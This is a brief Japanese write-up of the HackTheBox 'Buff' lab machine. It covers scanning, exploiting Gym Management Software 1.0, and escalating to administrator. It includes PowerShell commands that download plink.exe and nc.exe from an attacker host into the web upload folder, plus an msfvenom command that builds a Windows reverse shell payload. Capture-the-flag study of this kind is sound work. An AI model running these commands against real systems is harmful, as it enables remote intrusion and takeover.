HackTheBox - Buff

nmapでスキャンしました、ポートは8080だけ、オープンしています


ブラウザで8080ポートを開いて、ウェブサービスを実行しています


「Made Using Gym Management software 1.0」見ると、オープンソースシステムかもしれません。

searchsploitコマンドで調べて、やはり利用できます。


buff\shaun ユーザーを取得しました




関連ファイルをアップロードする

powershell -command "& { iwr http://10.10.14.231:8000/plink.exe -OutFile C:\xampp\htdocs\gym\upload\plink.exe }"
powershell -command "& { iwr http://10.10.14.231:8000/nc.exe -OutFile C:\xampp\htdocs\gym\upload\nc.exe }"




ペイロードを生成して、プログラムを修正します

生成コマンド: 

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.231 LPORT=8644 -f c




ポートをマッピングする

この時、もうリモートサーバの8888ポートはローカルにマッピングされました。


ペイロードプログラムを実行する、

python 2.py


リモートからadmin権限を取得しました

评论